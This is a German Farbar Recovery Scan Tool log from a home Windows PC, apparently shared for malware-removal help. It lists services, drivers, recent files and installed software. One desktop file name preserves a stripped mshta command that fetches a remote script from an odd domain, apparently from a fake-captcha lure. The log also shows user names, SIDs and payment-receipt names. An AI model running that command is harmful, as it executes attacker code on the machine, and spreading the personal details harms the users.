S2 LPlatSvc; C:\WINDOWS\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\LPlatSvc.exe [915824 2023-06-20] (Lenovo -> Lenovo)
R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe [1447680 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [559368 2024-11-13] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 SteelSeriesUpdateService; C:\Program Files\SteelSeries\GG\SteelSeriesUpdateService.exe [35192 2022-12-07] (SteelSeries ApS -> )
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [22442808 2024-09-03] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [804296 2023-07-12] (Oracle Corporation -> Oracle and/or its affiliates)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10430256 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
S3 ViGEmBusUpdater; C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\ViGEmBusUpdater.exe [901144 2019-05-10] (Nefarius Software Solutions e.U. -> Nefarius Software Solutions e.U.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\NisSrv.exe [3199672 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe [141952 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 ZoomCptService; "C:\Program Files\Common Files\Zoom\Support\CptService.exe" -user_path "C:\Users\Marcel\AppData\Roaming\Zoom"
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R3 amdfendrmgr; C:\WINDOWS\System32\drivers\amdfendrmgr.sys [35344 2022-09-09] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
R3 amdwddmg; C:\WINDOWS\System32\DriverStore\FileRepository\u0395847.inf_amd64_7b3125a3a274bd68\B395725\amdkmdag.sys [99747448 2023-09-20] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
R3 AMDXE; C:\WINDOWS\System32\drivers\amdxe.sys [59920 2022-05-31] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
S3 CH341SER_A64; C:\WINDOWS\System32\Drivers\CH341S64.SYS [78328 2021-08-25] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
S3 ctxapdriver; C:\WINDOWS\system32\DRIVERS\ctxapdriver.sys [81584 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
S3 ctxapinject; C:\WINDOWS\system32\DRIVERS\ctxapinject.sys [128680 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
S4 ctxapusbfilter; C:\WINDOWS\system32\DRIVERS\ctxapusbfilter.sys [61600 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
S4 CtxDs2; C:\WINDOWS\System32\drivers\CtxDs2.sys [186800 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
S4 CtxDt2; C:\WINDOWS\System32\drivers\CtxDt2.sys [229400 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
S4 CtxIsolate; C:\WINDOWS\System32\drivers\CtxIsolate.sys [341536 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
S4 CtxSupport; C:\WINDOWS\System32\drivers\CtxSupport.sys [108576 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
R2 ctxusbm; C:\WINDOWS\system32\DRIVERS\ctxusbmon.sys [164000 2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
R0 fse; C:\WINDOWS\System32\drivers\fse.sys [218592 2024-11-13] (Microsoft Windows -> Microsoft Corporation)
R2 googledrivefs31626; C:\Program Files\Google\Drive File Stream\Drivers\31626\googledrivefs31626.sys [384096 2024-07-25] (Microsoft Windows Hardware Compatibility Publisher -> Google, Inc.)
S3 HidGuardian; C:\WINDOWS\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
R3 IBMPMDRV; C:\WINDOWS\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\ibmpmdrv.sys [56128 2023-06-20] (Lenovo -> Lenovo)
S3 libusbK; C:\WINDOWS\System32\drivers\libusbK.sys [47200 2022-06-16] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [44880 2024-09-27] (Logitech Inc -> Logitech)
S3 logi_joy_vir_hid; C:\WINDOWS\system32\drivers\logi_joy_vir_hid.sys [32080 2022-10-06] (Logitech Inc -> Logitech)
R3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [73040 2024-09-27] (Logitech Inc -> Logitech)
R3 logi_lamparray; C:\WINDOWS\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray.sys [89192 2024-10-30] (Logitech Inc -> Logitech, Inc.)
R1 npcap; C:\WINDOWS\system32\DRIVERS\npcap.sys [69984 2024-01-18] (WDKTestCert Nmap,133147429230506937 -> Insecure.Com LLC.)
S3 ovpn-dco; C:\WINDOWS\System32\drivers\ovpn-dco.sys [92664 2024-06-05] (WDKTestCert lev,133391533294737317 -> OpenVPN, Inc)
R1 PMDRVS; C:\WINDOWS\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\pmdrvs.sys [41792 2023-06-20] (Lenovo -> Lenovo)
S3 RtkUsbAD_03F00269; C:\WINDOWS\system32\drivers\RtUsbA64_03F00269.sys [428840 2020-06-16] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.)
S3 rtucx22x64; C:\WINDOWS\System32\DriverStore\FileRepository\rtucx22x64.inf_amd64_a6eb3abe5befec7d\rtucx22x64.sys [1876424 2024-04-24] (Realtek Semiconductor Corp. -> Realtek Corporation)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 ssdevfactory; C:\WINDOWS\System32\drivers\ssdevfactory.sys [42912 2022-07-06] (Microsoft Windows Hardware Compatibility Publisher -> SteelSeries ApS)
R3 SteamStreamingMicrophone; C:\WINDOWS\system32\drivers\SteamStreamingMicrophone.sys [40736 2020-06-01] (Valve Corp. -> )
R3 SteamStreamingSpeakers; C:\WINDOWS\system32\drivers\SteamStreamingSpeakers.sys [40736 2020-06-01] (Valve Corp. -> )
R1 steamxbox; C:\WINDOWS\System32\drivers\steamxbox.sys [278208 2023-02-21] (Valve Corp. -> Valve Corporation)
R3 SteelSeries_Sonar_VAD; C:\WINDOWS\System32\DriverStore\FileRepository\steelseries-sonar-vad.inf_amd64_889fe0b3603163e3\SteelSeries-Sonar-VAD.sys [92312 2022-11-08] (SteelSeries ApS -> Windows (R) Win 7 DDK provider)
R3 tap-tb-0901; C:\WINDOWS\System32\drivers\tap-tb-0901.sys [38656 2023-07-10] (TunnelBear, Inc. -> The OpenVPN Project)
S3 VBoxNetAdp; C:\WINDOWS\System32\drivers\VBoxNetAdp6.sys [253224 2023-07-12] (Oracle Corporation -> Oracle and/or its affiliates)
R1 VBoxNetLwf; C:\WINDOWS\system32\DRIVERS\VBoxNetLwf.sys [264096 2023-07-12] (Oracle Corporation -> Oracle and/or its affiliates)
R1 VBoxSup; C:\WINDOWS\system32\DRIVERS\VBoxSup.sys [1062048 2023-07-12] (Oracle Corporation -> Oracle and/or its affiliates)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [22216888 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R3 ViGEmBus; C:\WINDOWS\System32\drivers\ViGEmBus.sys [69168 2019-04-04] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 vmbusproxy; C:\WINDOWS\system32\drivers\vmbusproxy.sys [94208 2024-04-05] (Microsoft Windows -> )
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [22104 2024-10-30] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [606624 2024-10-30] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [105888 2024-10-30] (Microsoft Windows -> Microsoft Corporation)
S3 wintun; C:\WINDOWS\system32\DRIVERS\wintun.sys [29680 2024-07-02] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)
S3 WireGuard; C:\WINDOWS\System32\drivers\wireguard.sys [489368 2024-07-02] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)
U4 npcap_wifi; kein ImagePath
S3 polarbear-split-tunneling; \??\C:\Program Files (x86)\TunnelBear\Drivers\x64\SplitTunnelingDriver.sys [X]
S3 tapnordvpn; \SystemRoot\System32\drivers\tapnordvpn.sys [X]
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2025-01-06 12:19 - 2025-01-06 12:19 - 000000143 _____ C:\Users\Lisa\Desktop\mshta httpssolve.vwglq.comawjxs.cap.txt
2025-01-06 12:07 - 2025-01-06 12:07 - 000051092 _____ C:\Users\Lisa\Downloads\Shortcut.txt
2025-01-06 12:05 - 2025-01-06 12:07 - 000066202 _____ C:\Users\Lisa\Downloads\Addition.txt
2025-01-06 12:03 - 2025-01-06 12:19 - 000033105 _____ C:\Users\Lisa\Downloads\FRST.txt
2025-01-06 12:03 - 2025-01-06 12:19 - 000000000 ____D C:\FRST
2025-01-06 12:02 - 2025-01-06 12:02 - 002403840 _____ (Farbar) C:\Users\Lisa\Downloads\FRST64_0125.exe
2025-01-06 12:02 - 2025-01-06 12:02 - 002403840 _____ (Farbar) C:\Users\Lisa\Downloads\FRST64_0125 (1).exe
2025-01-06 11:39 - 2025-01-06 11:39 - 000722202 _____ C:\WINDOWS\system32\perfh007.dat
2025-01-06 11:39 - 2025-01-06 11:39 - 000149258 _____ C:\WINDOWS\system32\perfc007.dat
2025-01-06 11:37 - 2025-01-06 11:37 - 000000000 ____D C:\Users\Lisa\AppData\Roaming\Wireshark
2025-01-06 11:16 - 2025-01-06 11:16 - 000003460 _____ C:\WINDOWS\system32\Tasks\npcapwatchdog
2025-01-06 11:16 - 2025-01-06 11:16 - 000000000 ____D C:\WINDOWS\SysWOW64\Npcap
2025-01-06 11:16 - 2025-01-06 11:16 - 000000000 ____D C:\WINDOWS\system32\Npcap
2025-01-06 11:13 - 2025-01-06 11:34 - 000000000 ____D C:\Program Files\Wireshark
2025-01-06 11:12 - 2025-01-06 11:12 - 087277648 _____ (Wireshark development team) C:\Users\Lisa\Downloads\Wireshark-4.4.2-x64.exe
2025-01-06 10:57 - 2025-01-06 10:57 - 000000000 ____D C:\Users\Lisa\AppData\Roaming\PolarBear
2025-01-06 08:43 - 2025-01-06 08:43 - 000000143 _____ C:\Users\Lisa\Desktop\new 2.txt
2024-12-30 22:18 - 2024-12-30 22:19 - 685563904 _____ C:\Users\Marcel\Downloads\krd.iso
2024-12-30 20:34 - 2024-12-30 20:34 - 000000000 ____D C:\Users\Lisa\AppData\Local\INetHistory
2024-12-27 09:05 - 2024-12-30 20:42 - 000000000 ____D C:\Users\Lisa\AppData\Roaming\Notepad++
2024-12-27 08:57 - 2024-12-27 08:57 - 000069562 _____ C:\Users\Lisa\Desktop\Kilgenstein_Zahlung Beleg_27.12.24.pdf
2024-12-19 20:43 - 2024-12-19 20:43 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2024-12-19 13:44 - 2024-12-19 13:44 - 000070580 _____ C:\Users\Lisa\Desktop\Rüppel_Zahlung 19.12.24_Beleg.pdf
2024-12-19 13:29 - 2024-12-19 13:29 - 000232557 _____ C:\Users\Lisa\Desktop\Kilgenstein_Zahlung Beleg_19.12.24.pdf
2024-12-17 17:45 - 2024-12-17 17:45 - 000013951 _____ C:\Users\Marcel\Documents\Kopie von 241201_PayPal_Zahlungen_Fotografin_2024.xlsx
2024-12-11 12:23 - 2024-12-11 12:23 - 001254975 _____ C:\Users\Marcel\Downloads\WhatsApp Image 2024-12-11 at 10.08.46_2.jpeg
2024-12-11 12:23 - 2024-12-11 12:23 - 000002285 _____ C:\Users\Marcel\AppData\Local\recently-used.xbel
2024-12-11 12:03 - 2024-12-11 12:03 - 000115134 _____ C:\Users\Marcel\Downloads\WhatsApp Image 2024-12-11 at 09.33.38.jpeg
2024-12-11 10:32 - 2024-12-11 10:32 - 338740136 _____ (The GIMP Team ) C:\Users\Marcel\Downloads\gimp-2.10.38-setup-1.exe
2024-12-11 10:31 - 2024-12-11 11:47 - 000166704 _____ C:\Users\Marcel\Downloads\WhatsApp Image 2024-12-11 at 10.08.46.jpeg
2024-12-11 10:21 - 2024-12-11 10:22 - 000010534 _____ C:\Users\Marcel\Downloads\Bestellung Digitale Fotos.xlsx
2024-12-11 10:21 - 2024-12-11 10:21 - 000000000 ____D C:\Users\Marcel\AppData\Local\CtxUnleashClient
2024-12-11 10:20 - 2024-12-11 10:20 - 000002584 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix Workspace.lnk
2024-12-11 10:20 - 2024-12-11 10:20 - 000000000 ____D C:\ProgramData\Citrix
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2025-01-06 12:06 - 2022-05-07 06:22 - 000000000 ____D C:\WINDOWS\INF
2025-01-06 11:55 - 2022-05-07 06:24 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2025-01-06 11:45 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\SystemTemp
2025-01-06 11:43 - 2022-08-11 06:07 - 000000000 ____D C:\Program Files (x86)\AnyDesk
2025-01-06 11:42 - 2022-05-19 17:04 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2025-01-06 11:39 - 2024-04-05 10:06 - 001662892 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2025-01-06 11:38 - 2022-12-02 17:21 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2025-01-06 11:35 - 2024-04-05 10:06 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2025-01-06 11:35 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\ServiceState
2025-01-06 11:35 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\AppReadiness
2025-01-06 11:35 - 2022-02-28 16:48 - 000000000 ____D C:\Program Files\TeamViewer
2025-01-06 11:35 - 2022-02-28 14:40 - 000012288 ___SH C:\DumpStack.log.tmp
2025-01-06 11:34 - 2022-05-07 06:17 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2025-01-06 11:16 - 2022-03-29 15:28 - 000000000 ____D C:\Program Files\Npcap
2025-01-06 11:13 - 2022-03-03 11:35 - 000000000 ____D C:\ProgramData\Package Cache
2025-01-06 09:09 - 2022-02-28 21:18 - 000000000 ____D C:\Users\Lisa\AppData\Roaming\Microsoft\MMC
2025-01-06 08:41 - 2024-04-05 09:59 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2024-12-30 23:27 - 2024-04-05 09:59 - 000001607 _____ C:\WINDOWS\system32\config\VSMIDK
2024-12-30 23:27 - 2023-10-20 11:26 - 000000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Teams
2024-12-30 22:35 - 2022-05-07 06:24 - 000000000 ___HD C:\Program Files\WindowsApps
2024-12-30 22:28 - 2024-04-05 09:17 - 000000000 ____D C:\Users\Marcel
2024-12-30 22:09 - 2024-07-21 23:42 - 000000000 ____D C:\Users\Marcel\Documents\Bluetooth
2024-12-30 20:37 - 2023-07-05 07:26 - 000000000 ____D C:\Users\Lisa\AppData\Local\CrashDumps
2024-12-30 18:18 - 2022-02-28 18:30 - 000000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Word
2024-12-27 10:26 - 2022-03-30 08:07 - 000000000 ____D C:\ProgramData\Barrier
2024-12-27 08:57 - 2022-02-28 15:48 - 000000000 ____D C:\Users\Marcel\AppData\Local\D3DSCache
2024-12-27 08:48 - 2022-02-28 15:59 - 000000000 ____D C:\Users\Lisa\AppData\Local\D3DSCache
2024-12-27 08:15 - 2022-02-28 14:40 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2024-12-27 08:10 - 2022-02-28 15:54 - 000002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2024-12-27 08:09 - 2024-04-05 10:06 - 000003756 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2024-12-27 08:09 - 2024-04-05 10:06 - 000003632 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2024-12-19 20:58 - 2022-05-07 06:24 - 000000000 ____D C:\ProgramData\USOPrivate
2024-12-19 20:43 - 2022-05-07 06:24 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2024-12-19 20:42 - 2024-04-05 09:59 - 000675104 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2024-12-19 20:42 - 2022-02-28 17:15 - 000000000 ____D C:\Program Files\Microsoft Office
2024-12-19 20:41 - 2023-10-01 08:01 - 000000000 ____D C:\WINDOWS\system32\Microsoft-Edge-WebView
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ___SD C:\WINDOWS\system32\UNP
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ___SD C:\WINDOWS\system32\lxss
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ___RD C:\WINDOWS\PrintDialog
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\SystemResources
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\Sgrm
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\setup
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\oobe
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\HealthAttestationClient
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\Dism
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\appraiser
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\ShellExperiences
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\ShellComponents
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\bcastdvr
2024-12-19 20:39 - 2024-04-05 09:17 - 000000000 ____D C:\Users\Lisa
2024-12-17 17:45 - 2022-03-01 10:38 - 000000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Excel
2024-12-17 17:45 - 2022-03-01 09:38 - 000000000 ____D C:\Users\Marcel\AppData\Local\babl-0.1
2024-12-17 14:28 - 2022-02-28 15:48 - 000000000 ____D C:\Users\Marcel\AppData\Local\Packages
2024-12-17 13:38 - 2022-08-04 09:32 - 000000000 ____D C:\Users\Marcel\Documents\Arduino
2024-12-17 13:26 - 2024-04-25 19:38 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1775496863-3233068474-2158662417-1002
2024-12-17 13:26 - 2024-04-25 19:38 - 000003356 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1775496863-3233068474-2158662417-1002
2024-12-17 13:26 - 2022-02-28 16:00 - 000002396 _____ C:\Users\Lisa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2024-12-17 13:26 - 2022-02-28 15:59 - 000000000 ____D C:\Users\Lisa\AppData\Local\Packages
2024-12-17 13:21 - 2022-07-28 20:59 - 000002173 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive.lnk
2024-12-15 20:29 - 2022-02-28 17:05 - 000000000 ___RD C:\Users\Marcel\Qsync
2024-12-15 20:28 - 2022-02-28 20:58 - 000000000 ___RD C:\Users\Lisa\Qsync
2024-12-13 12:49 - 2022-12-04 12:47 - 000000000 ____D C:\WINDOWS\system32\SteelSeries
2024-12-13 12:41 - 2024-04-05 10:06 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2024-12-13 12:41 - 2022-10-17 16:40 - 000002073 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat.lnk
2024-12-11 12:23 - 2022-03-16 11:25 - 000000000 ____D C:\Users\Marcel\AppData\Local\gtk-2.0
2024-12-11 10:20 - 2023-09-12 11:59 - 000000000 ____D C:\Program Files (x86)\Citrix
2024-12-11 10:17 - 2023-10-20 12:51 - 000000000 ____D C:\Program Files (x86)\dotnet
2024-12-11 10:14 - 2022-10-26 08:54 - 000037417 _____ C:\WINDOWS\system32\SEAPODATUR.USB.VID_03F0&PID_0269&MI_00.zip
2024-12-10 21:11 - 2022-05-07 06:17 - 000000000 ____D C:\WINDOWS\CbsTemp
2024-12-10 21:08 - 2024-04-05 10:00 - 003212800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2024-12-10 10:08 - 2022-08-04 09:32 - 000000000 ____D C:\Users\Marcel\AppData\Local\Arduino15
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
2022-02-28 16:53 - 2022-12-02 18:07 - 000000998 _____ () C:\ProgramData\ChrEdgeFkOff.vbs
2022-07-23 10:41 - 2022-07-23 10:41 - 000000000 _____ () C:\Users\Lisa\AppData\Local\oobelibMkey.log
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ========================
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-01-2025
durchgeführt von Lisa (06-01-2025 12:20:02)
Gestartet von C:\Users\Lisa\Downloads
Microsoft Windows 11 Pro Version 23H2 22631.4602 (X64) (2024-04-05 09:06:15)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
Administrator (S-1-5-21-1775496863-3233068474-2158662417-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1775496863-3233068474-2158662417-503 - Limited - Disabled)
Gast (S-1-5-21-1775496863-3233068474-2158662417-501 - Limited - Disabled)
Lisa (S-1-5-21-1775496863-3233068474-2158662417-1002 - Administrator - Enabled) => C:\Users\Lisa
Marcel (S-1-5-21-1775496863-3233068474-2158662417-1001 - Administrator - Enabled) => C:\Users\Marcel
WDAGUtilityAccount (S-1-5-21-1775496863-3233068474-2158662417-504 - Limited - Disabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
7-Zip 21.07 (x64) (HKLM\...\7-Zip) (Version: 21.07 - Igor Pavlov)
Adobe Acrobat (64-bit) (HKLM\...\{AC76BA86-1031-1033-7760-BC15014EA700}) (Version: 24.005.20320 - Adobe)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 8.5.1.48 - Adobe Inc.)
Adobe Refresh Manager (HKLM-x32\...\{AC76BA86-0804-1033-1959-018244601102}) (Version: 1.8.0 - Adobe Systems Incorporated) Hidden
AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 7.0.15 - AnyDesk Software GmbH)
AppDataProtection (HKLM-x32\...\{C375DC29-9995-4941-91E2-18A203E4BE85}) (Version: 24.8.0.9 - Citrix Systems, Inc.) Hidden
Arduino (HKLM-x32\...\Arduino) (Version: 1.8.19 - Arduino LLC)
Barrier 2.4.0-release (HKLM\...\{41036EA6-3F7A-4803-8AE0-469E5E91EFCC}_is1) (Version: 2.4.0-release - Debauchee Open Source Group)
BCR Plug-in (HKLM-x32\...\{FCAF693B-BEB8-48BD-9444-ED306F51AF41}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Citrix Authentication Manager (HKLM-x32\...\{72390194-1E29-4490-A2A5-0F0060EB54EC}) (Version: 24.9.0.25 - Citrix Systems, Inc.) Hidden
Citrix Web Helper (HKLM-x32\...\{0E8A240D-B3AE-414E-B792-ACAE55F5E6FE}) (Version: 24.9.1.86 - Citrix Systems, Inc.) Hidden
Citrix Workspace (DV) (HKLM-x32\...\{1E3281BC-B91F-41AA-A453-71EB05F88638}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Citrix Workspace (USB) (HKLM-x32\...\{7C4F4420-4846-42C5-9D4D-595F486C037D}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Citrix Workspace 2409 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 24.9.1.207 - Citrix Systems, Inc.)
Citrix Workspace Inside (HKLM-x32\...\{6CC4B606-D167-496C-A0EF-7BF2AF343715}) (Version: 24.9.1.85 - Citrix Systems, Inc.) Hidden
CurseForge 1.265.0-21056 (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\ca0e291c-abd4-5fc3-b6a0-3d4333eccbd7) (Version: 1.265.0-21056 - Overwolf)
Discord (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Discord) (Version: 1.0.9018 - Discord Inc.)
Docker Desktop (HKLM\...\Docker Desktop) (Version: 4.18.0 - Docker Inc.)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.208.0.5465 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{99e78c1c-d34b-42af-bb92-112bf15e2dcf}) (Version: 12.208.0.5465 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{5F15891E-8342-47CD-AFFF-89211CFC04D0}) (Version: 1.3.23.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{758842D2-1538-4008-A8E3-66F65A061C52}) (Version: 2.0.33.0 - Epic Games, Inc.)
GIMP 2.10.30 (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\GIMP-2_is1) (Version: 2.10.30 - The GIMP Team)
Git (HKLM\...\Git_is1) (Version: 2.35.1.2 - The Git Development Community)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 131.0.6778.205 - Google LLC)
Google Drive (HKLM\...\{6BBAE539-2232-434A-A4E5-9A33560C6283}) (Version: 101.0.3.0 - Google LLC)
InputMapper 1.7 (HKLM-x32\...\{E254D258-ACA2-48DD-86A8-711ADA4F5458}) (Version: 1.7.7452.13622 - DSDCS) Hidden
InputMapper 1.7 (HKLM-x32\...\InputMapper 1.7 1.7.7452.13622) (Version: 1.7.7452.13622 - DSDCS)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LibreOffice 7.3.1.3 (HKLM\...\{2AB46F12-061D-4BB1-BE17-FD65830DE46B}) (Version: 7.3.1.3 - The Document Foundation)
Logitech G HUB (HKLM\...\{521c89be-637f-4274-a840-baaf7460c2b2}) (Version: 2024.8.641856 - Logitech)
Microsoft .NET Host - 6.0.20 (x86) (HKLM-x32\...\{82F89EDB-1DF1-402B-BED6-01C736967B6F}) (Version: 48.83.63169 - Microsoft Corporation) Hidden
Microsoft .NET Host - 8.0.4 (x86) (HKLM-x32\...\{417B3118-9B7D-44B2-9AE8-B309A107636B}) (Version: 64.16.12025 - Microsoft Corporation) Hidden
